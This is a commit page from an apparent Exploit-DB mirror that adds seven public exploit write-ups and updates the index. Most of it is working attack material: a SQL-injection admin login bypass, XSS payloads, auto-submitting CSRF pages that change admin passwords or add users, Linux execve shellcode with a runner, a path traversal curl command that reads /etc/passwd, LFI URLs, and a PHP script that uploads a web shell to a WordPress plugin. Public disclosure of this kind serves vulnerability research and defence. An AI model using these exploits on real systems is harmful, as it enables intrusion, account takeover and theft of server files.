bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-06-13

Browse source 
7 new exploits
This commit is contained in:
Offensive Security 2015-06-13 05:02:28 +00:00
parent dc651e3c85
commit 20d0fff830
10 changed files with 721 additions and 15 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
files.csv
View file

@ -33612,7 +33612,8 @@ id,file,description,date,author,platform,type,port
37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script v1.0 - (time based) SQLi",2015-06-09,"John Smith",php,webapps,0
37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQLi",2015-06-09,Pancaker,php,webapps,0
37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0
37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC",2015-06-08,"Pawel Wylecial",windows,dos,0
@ -33621,6 +33622,7 @@ id,file,description,date,author,platform,type,port
37243,platforms/php/webapps/37243.txt,"Wordpress Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80
37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0
37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection Vulnerability",2015-06-08,"Sebastian khan",php,webapps,0
37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
37256,platforms/multiple/webapps/37256.txt,"Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability",2015-06-10,Vulnerability-Lab,multiple,webapps,0
@ -33633,3 +33635,8 @@ id,file,description,date,author,platform,type,port
37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,0
37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80
37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80

Can't render this file because it is too large.

137
platforms/jsp/webapps/37272.txt Executable file
View file

@ -0,0 +1,137 @@
# Exploit Title: SQL Injection & Persistent XSS
# Google Dork: intitle: SQL Injection & Persistent XSS
# Date: 2015-06-12
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: zencherry.com
# Software Link: sourceforge.net/projects/zencherrycms
# Version: 1.1
# Tested on: windows 7 on Apache Tomcat
# Category: webapps
Vendor:
=============================================
http://zencherry.com/
http://sourceforge.net/projects/zencherrycms
Product:
==================================================
ZCMS 1.1 JavaServer Pages Content Management System
Advisory Information:
==============================
SQL Injection & Persistent XSS
Vulnerability Details:
======================
SQL Injection:
Login to admin area requires a password but is easily bypassed
using classic SQLInjection method because application uses
concatenated user input to construct SQL queries.
ZCMS exploitable admin login code:
==================================
squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users
WHERE
status = 0 AND username = '"+username+"' AND password =
'"+request.getParameter("pass") +"' AND type = 1 ;";
So we just supply an Admin password like ---> HELL' OR '2'='2
which will resolve as true!
SQL Inject XSS Payload:
=======================
We can also inject persisten XSS payload directly to MySQL database
subverting
all character filtering leveraging existing SQLInjection vulnerabilities.
Persistent XSS:
===============
Another persistent XSS vector is here in author field for comments:
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page
number]
Exploit code(s):
===============
1) Bypass admin login
---------------------
localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login
Enter 'admin' for username field
Enter HELL' OR '2'='2 for the pass field
2) Inject XSS using SQL Injection
---------------------------------
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title=
"<script>alert(1)</script>
&content=<script>alert(1)</script>&author=<script>alert(1)</script>
SATAN&visibility=1&type=1&comm=0
3) Persistent XSS field
-----------------------
http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page
number]
Inject <script>alert(666)</script> in author input field.
Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 12, 2015 : Public Disclosure
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] GET & POST
Vulnerable Product: [+] ZCMS_1.1
Vulnerable Parameter(s): [+] pass, title, content, author
Affected Area(s): [+] Admin, CMS
===============================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that
it is not altered except by reformatting it, and that due credit is given.
Permission is
explicitly given for insertion in vulnerability databases and similar,
provided that
due credit is given to the author. The author is not responsible for any
misuse of the
information contained herein and prohibits any malicious use of all
security related
information or exploits by the author or elsewhere.
(hyp3rlinx)

29
platforms/lin_x86/shellcode/37251.asm Executable file
View file

@ -0,0 +1,29 @@
Linux/x86 execve /bin/sh shellcode 21 bytes
#Greetz : KnocKout,curtis,Bomberman(Leader)
#Author : B3mB4m
Disassembly of section .text:
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 2f 2f 73 68 push $0x68732f2f
8048068: 68 2f 62 69 6e push $0x6e69622f
804806d: 89 e3 mov %esp,%ebx
804806f: 89 c2 mov %eax,%edx
8048071: b0 0b mov $0xb,%al
8048073: cd 80 int $0x80
#include <stdio.h>
#include <string.h>
char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc2\xb0\x0b\xcd\x80";
int main(void){
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();}
# Length: 21 PWNED !

8
platforms/linux/local/120.c
View file

@ -59,7 +59,7 @@
#define PATH "/usr/local/bin/terminatorX"
#define RET 0xbffff69e
char shellcode[] "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
char shellcode[]= "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
char *buffer,*ptr;
@ -234,6 +234,6 @@ main(int argc,char *argv[])
return 0;
}
// milw0rm.com [2003-11-13]
// milw0rm.com [2003-11-13]

68
platforms/multiple/webapps/37271.txt Executable file
View file

@ -0,0 +1,68 @@
# Exploit title: Opsview 4.6.2 - Multiple XSS
# Date: 07-06-2015
# Vendor homepage: www.opsview.com
# Version: 4.6.2
# CVE: CVE-2015-4420
# Author: Dolev Farhi @dolevf
# Tested On: Kali Linux + Windows 7
# Details:
# --------
# Opsview is a monitoring system based on Nagios Core. Opsview is prone to several stored and reflected XSS vulnerabilities in the latest version
1. Stored XSS through a malicious check plugin
a. Create a plugin with the following content:
#!/bin/bash
echo '<script>alert("script0t0s")</script>'
exit 2
b. create a new check and assign this plugin.
c. once a host uses this check, navigate to the event page, the XSS will be injected.
d. once a user/admin acknowledges this critical event (exit 2), the code will be injected prior his acknowledgement.
2. Stored XSS in host profile
a. add a host
b. in the description of the host, add a description as the one below:
<script>alert(document.cookie)</script>
c. save settings
d. once a user/admin views the host settings, XSS will be injected.
3. Reflected XSS in Test service check page.
a. Add a new service check
b. Test the new service check against any host and provide in the command line the following <script>alert("test")</script>
c. the XSS will immediately reflect to the screen.
response output:
POST /state/service/166/exec HTTP/1.1
Host: 192.168.0.20
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.20/status/service?host_state=0&host_filter=handled&host=opsview
Content-Length: 105
Cookie: PHPSESSID=
auth_tkt=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E&_CSRFToken=0x84BCDAD00D5111E5988CB34E7AFD915

10
platforms/php/webapps/37248.txt
View file

@ -103,13 +103,3 @@ ___________    ____   ____ _____  |  | __ ___________
|   __(____  /___|  /\___  >____  /__|_ \\___  >__|
|__|       \/     \/     \/     \/     \/    \/
.........................cant be pr0 without ascii art
Den tisdag, 9 juni 2015 8:17 skrev john smith <pancaker_1338@yahoo.se>:
sir - y u no pub?https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4137

51
platforms/php/webapps/37266.txt Executable file
View file

@ -0,0 +1,51 @@
# Exploit Title: ClickHeat <1.1.4 Change Admin Password CSRF
# Google Dork: allinurl:/clickheat/
# Date: 11-06-2015
# Exploit Author: David Shanahan (@CyberpunkSec)
# Contact: https://twitter.com/CyberpunkSec
# Vendor Homepage: http://www.labsmedia.com/clickheat/index.html
# Software Link: http://sourceforge.net/projects/clickheat/files/clickheat/
# Version: 1.14
# Tested on: Windows
---- Description ----
ClickHeat is vulnerable to a CSRF attack because it does not implement a
CSRF token when updating the config file. If an authenticated admin is
tricked into opening this malicious URL, the form will be submitted which
changes the administrator password to the one the attacker has specified.
---- CSRF PoC ----
Set the value of "adminLogin" to the administrators username, then set the
value of "adminPass" to a md5 hash of the password you want. (you may also
need to change the "logPath" & "cachePath")
/* CODE */
<body onload="document.forms[0].submit()">
<form action="http://127.0.0.1/clickheat/index.php?action=config"
method="post" class="center">
<input type="hidden" name="config" value="a:23:{s:7:"logPath";s:31:"C:/xampp
/htdocs/clickheat/logs/";s:9:"cachePath";s:32:"C:/xampp/htdocs/clickheat
/cache/";s:8:"referers";b:0;s:6:"groups";b:0;s:8:"filesize";i:0;s:10:"
adminLogin";s:5:"admin";s:9:"adminPass";s:32:"
5f4dcc3b5aa765d61d8327deb882cf99";s:11:"viewerLogin";s:0:"";s:10:"viewerPass
";s:0:"";s:6:"memory";i:128;s:4:"step";i:5;s:3:"dot";i:19;s:5:"flush";i:40;s:5:"start";s:1:"m";s:7:"palette";b:0;s:7:"
heatmap";b:1;s:11:"hideIframes";b:1;s:11:"hideFlashes
";b:1;s:9:"yesterday";b:0;s:5:"alpha";i:80;s:13:"__screenSizes
";a:10:{i:0;i:0;i:1;i:240;i:2;i:640;i:3;i:800;i:4;i:1024;i:5;i:1152;i:6;i:1280;i:7;i:1440;i:8;i:1600;i:9;i:1800;}s:14:"__
browsersList";a:7:{s:3:"all";s:0:"";s:4:"msie";s:17:"Internet
Explorer";s:7:"firefox";s:7:"Firefox";s:6:"chrome";s:6:"Chrome";s:6:"safari";s:6:"Safari";s:5:"opera";s:5:"Opera";s:7:"unknown";s:0:"";}s:7:"version";s:4:"1.14";}"
/>
<input type="hidden" name="save" value="true" /><input type="submit"
value="Save configuration" /></form>
/* CODE */
---- Solution ----
The ClickHeat project seems to be dead, as it has not been updated since
late 2011. Due to this, I truly doubt a patch will be issued so I would
recommend removing this product from your website.

284
platforms/php/webapps/37270.txt Executable file
View file

@ -0,0 +1,284 @@
# Exploit Title: CSRF, Persistent XSS & LFI
# Google Dork: intitle: CSRF, Persistent XSS & LFI
# Date: 2015-06-11
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: kilrizzy.github.io/Nakid-CMS
# Software Link: kilrizzy.github.io/Nakid-CMS
# Version: kilrizzy-Nakid-CMS-f274624
# Tested on: windows 7 on XAMPP
# Category: webapps
Vendor:
================================
http://kilrizzy.github.io/Nakid-CMS/
Product:
================================
kilrizzy-Nakid-CMS-f274624
Nakid CMS is an open source content management system built using PHP and
CodeIgniter.
Setup mode:
==========
Under root dir for Nakid CMS we set to production mode instead of
development in index.php.
e.g. define('ENVIRONMENT', 'production');
Advisory Information:
================================================
CSRF, Persistent XSS & Auth bypass LFI
Vulnerability Details:
=====================
Multiple CSRF(s) exist:
We have ability to do the following as no CSRF tokens are present.
1-Change Admin password
2-Add arbitrary users to system
3-Alter system settings
XSS (persistent):
XSS parameter vulnerabilities exist for the following:
payloads will be stored in the MySQL database and activated when a victim
visits the vulnerable webpage.
XSS URL:
--------
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/users
On the "Edit Record" pop up dialog box.
Vulnerable parameters:
---------------------
username
password
email
fname
lname
XSS URL:
--------
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings
On the "Edit Record" pop up dialog box.
Vulnerable parameters:
---------------------
from_name
include_path
primary_email
from_email
XSS URL:
--------
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/content_edit/1
Vulnerable parameter:
--------------------
title
Authentication bypass LFI:
Local file inclusion to bypass access controls and read aribitrary files
exist by setting '$url' PHP variable on following URL
index.php/connector$url
Exploit POC code(s):
====================
CSRF(s):
========
Condition:
Pursuade victim to visit our webpage or click our link, if they have a
session then we do our CSRF!.
1- Add arbitrary user to system
--------------------------------
<!DOCTYPE>
<html>
<head>
<script>
function doit(){
var e=document.getElementById('ruinurlife')
e.submit()
}
</script>
</head>
<body onLoad="doit()">
<form id="ruinurlife" action="
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/users"
method="post">
<input type="text" name="username" value="sum1" />
<input type="text" name="password" value="abc123" />
<input type="text" name="email" value="X@X.com"/>
<input type="text" name="fname" value="sum"/>
<input type="text" name="lname" value="1"/>
<input type="text" name="oper" value="add"/>
<input type="text" name="id" value="_empty"/>
</form>
</body>
</html>
2-Change Admin password
------------------------
<!DOCTYPE>
<html>
<head>
<script>
function doit(){
var e=document.getElementById('ruinurlife')
e.submit()
}
</script>
</head>
<body onLoad="doit()">
<form id="ruinurlife" action="
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/profile"
method="post">
<input type="text" name="username" value="admin" />
<input type="text" name="password" value="xyz123" />
<input type="text" name="email" value="hell@abyss.com"/>
<input type="text" name="fname" value="hyp3r"/>
<input type="text" name="lname" value="linx"/>
<input type="text" name="action" value="edit_profile"/>
<input type="text" name="submitbt" value="Save"/>
</form>
</body>
</html>
3-Alter system settings
-----------------------
<!DOCTYPE>
<html>
<head>
<script>
function doit(){
var e=document.getElementById('ruinurlife')
e.submit()
}
</script>
</head>
<body onLoad="doit()">
<form id="ruinurlife" action="
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/settings"
method="post">
<input type="text" name="value" value="HELL@ABYSS.com" />
<input type="text" name="oper" value="edit" />
<input type="text" name="id" value="1"/>
</form>
</body>
</html>
XSS persistent POC code:
=======================
Inject <script>alert(666)</script> into any of the following vulnerable
fields described above using POST method.
Need to highlight a row then click edit dialog box to edit settings.
e.g.
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings
from_name <------- <script>alert(666)</script>
include_path
primary_email
from_email
Authorization bypass LFI:
========================
1- Logout, create a hell.txt file or whatever and put in 'htdocs' or web
root, then visit the URL (change to suit your environment).
2-
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../../hell.txt
OR try
http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../xampp/phpinfo.php
Disclosure Timeline:
=========================================================
Vendor Notification: NA
June 11, 2015 : Public Disclosure
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] GET & POST
Vulnerable Product: [+] kilrizzy-Nakid-CMS-f274624
Vulnerable Parameter(s): [+]
username
password
email
fname
lname
from_name
include_path
primary_email
from_email
title
connector$url
Affected Area(s): [+] /system/users
/system/profile
/system/content_edit/
===============================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.
(hyp3rlinx)

53
platforms/php/webapps/37274.txt Executable file
View file

@ -0,0 +1,53 @@
Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-06
Advisory: http://www.vapid.dhs.org/advisory.php?v=124
Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/
Vendor: https://profiles.wordpress.org/sedevelops/
Vendor Notified: 2015-06-06
Vendor Contact: https://profiles.wordpress.org/sedevelops/
Description:
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.
Vulnerability:
The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../.
This vulnerability doesnt require authentication to the Wordpress site.
File ./se-html5-album-audio-player/download_audio.php:
3 $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file'];
4 $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/');
5 // make sure it's a file before doing anything!
6 if( is_file($file_name) && $is_in_uploads_dir !== false ) {
7
8 // required for IE
9 if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off'); }
10
11 // get the file mime type using the file extension
12 switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
13 case 'pdf': $mime = 'application/pdf'; break;
14 case 'zip': $mime = 'application/zip'; break;
15 case 'jpeg':
16 case 'jpg': $mime = 'image/jpg'; break;
17 default: $mime = 'application/force-download';
18 }
19 header('Pragma: public'); // required
20 header('Expires: 0'); // no cache
21 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
22 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
23 header('Cache-Control: private',false);
24 header('Content-Type: '.$mime);
25 header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
26 header('Content-Transfer-Encoding: binary');
27 header('Content-Length: '.filesize($file_name)); // provide file size
28 header('Connection: close');
29 readfile($file_name); // push it out
30 exit();
The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory.
CVEID: 2015-4414
OSVDB:
Exploit Code:
• $ curl http://server/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd

87
platforms/php/webapps/37275.txt Executable file
View file

@ -0,0 +1,87 @@
Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-07
Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
Vendor: Waters Edge Web Design and NetherWorks LLC
Vendor Notified: 2015-06-08
Advisory: http://www.vapid.dhs.org/advisory.php?v=125
Vendor Contact: plugins@wordpress.org
Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.
Vulnerability:
There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system. Including a .php file. The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.
In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesnt check for an authenticated Wordpress user:
1 <?php
2
3 $filename = $_SERVER["DOCUMENT_ROOT"]."/wp-load.php";
4 if (file_exists($filename)) {
5 include_once($filename);
6 } else {
7 include_once("../../../../wp-load.php");
8 }
9 echo "Here";
10 $image_file = $_FILES['gf_aviary_file'];
11 if($image_file['name']!=''){
12 $max_file_size = 4*1024*1024;
13 $file_size = intval($image_file['size']);
14 if( $file_size > $max_file_size ){
15 $msg = "File Size is too big.";
16 $error_flag = true;
17 }
18 $extension = strtolower(end(explode('.', $image_file['name'])));
19 $aa_options = get_option('gf_aa_options');
20 $supported_files = $aa_options['supported_file_format'];
21 $supported_files = strtolower($supported_files);
22 if(!$error_flag && $supported_files != '' ){
23 $supported_files = explode (',', $supported_files);
24 if(!in_array($extension, $supported_files)){
25 $msg = "No Supported file.";
26 $error_flag = true;
27 }
28 }
29 if(!$error_flag){
30 $wp_upload_dir = wp_upload_dir();
31 if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
32 mkdir($wp_upload_dir['basedir'].'/gform_aviary');
33 }
34 $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
35 $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
36 $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name' ];
37 if(move_uploaded_file($image_file['tmp_name'], $file_name)){
38 $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['na me'];
39 }
40 }
41 $return_obj = array('status' => 'success', 'message' => $file_url);
42 echo json_encode($return_obj);
43 }
44 ?>
CVEID: 2015-4455
OSVDB:
Exploit Code:
<?php
/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0
6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
*/
$target_url = 'http://server/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
$file_name_with_full_path = '/var/www/shell.php';
echo "POST to $target_url $file_name_with_full_path";
$post = array('name' => 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>